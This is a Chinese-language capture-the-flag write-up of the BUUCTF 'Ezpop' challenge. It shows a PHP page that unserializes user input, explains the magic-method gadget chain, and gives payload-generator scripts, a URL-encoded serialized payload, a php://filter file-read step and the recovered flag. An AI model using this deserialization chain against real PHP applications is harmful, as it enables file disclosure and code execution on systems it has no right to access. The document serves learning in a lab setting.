BUUCTF——Ezpop
BUUCTF——Ezpop
进入靶场
给了php代码
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {protected $var;public function append($value){include($value);}public function __invoke(){$this->append($this->var);}
}class Show{public $source;public $str;public function __construct($file='index.php'){$this->source = $file;echo 'Welcome to '.$this->source."<br>";}public function __toString(){return $this->str->source;}public function __wakeup(){if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {echo "hacker";$this->source = "index.php";}}
}class Test{public $p;public function __construct(){$this->p = array();}public function __get($key){$function = $this->p;return $function();}
}if(isset($_GET['pop'])){@unserialize($_GET['pop']);
}
else{$a=new Show;highlight_file(__FILE__);
}
这段代码展示了一个典型的PHP反序列化漏洞利用场景,通过精心构造的序列化数据可以实现文件包含和任意代码执行。
代码结构分析
代码包含三个类:
- Modifier类:
- 包含一个受保护的属性
$var - 有
append()方法,可以包含任意文件 - 当对象被当作函数调用时(
__invoke),会执行append($this->var)
- 包含一个受保护的属性
- Show类:
- 包含
$source和$str属性 - 有
__toString()魔术方法,当对象被当作字符串时会返回$this->str->source - 有
__wakeup()魔术方法,在反序列化时执行,对$source进行过滤
- 包含
- Test类:
- 包含
$p属性 - 有
__get()魔术方法,当访问不存在的属性时,会将$p作为函数调用
- 包含
构造payload
<?php
class Modifier {protected $var = "flag.php";
}class Show {public $source;public $str;
}class Test {public $p;
}$modifier = new Modifier();
$test = new Test();
$test->p = $modifier;$show1 = new Show();
$show1->str = $test;$show2 = new Show();
$show2->source = $show1;echo urlencode(serialize($show2));
?>
将生成的序列化代码在url中传给?pop
?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
没拿到
再用伪协议base64输出一下看看
构造payload
<?php
class Modifier {protected $var = "php://filter/read=convert.base64-encode/resource=flag.php";
}class Show {public $source;public $str;
}class Test {public $p;
}$modifier = new Modifier();
$test = new Test();
$test->p = $modifier;$show1 = new Show();
$show1->str = $test;$show2 = new Show();
$show2->source = $show1;echo urlencode(serialize($show2));
?>
拿到base64编码
PD9waHAKY2xhc3MgRmxhZ3sKICAgIHByaXZhdGUgJGZsYWc9ICJmbGFne2M0ZmViNWFmLTZiOTgtNGQ1Ni04MWFmLWNhZTJjNDVhZGNjM30iOwp9CmVjaG8gIkhlbHAgTWUgRmluZCBGTEFHISI7Cj8+
解码看看
<?php
class Flag{private $flag= "flag{c4feb5af-6b98-4d56-81af-cae2c45adcc3}";
}
echo "Help Me Find FLAG!";
?>
拿到flag
flag{c4feb5af-6b98-4d56-81af-cae2c45adcc3}
下播!!!!!
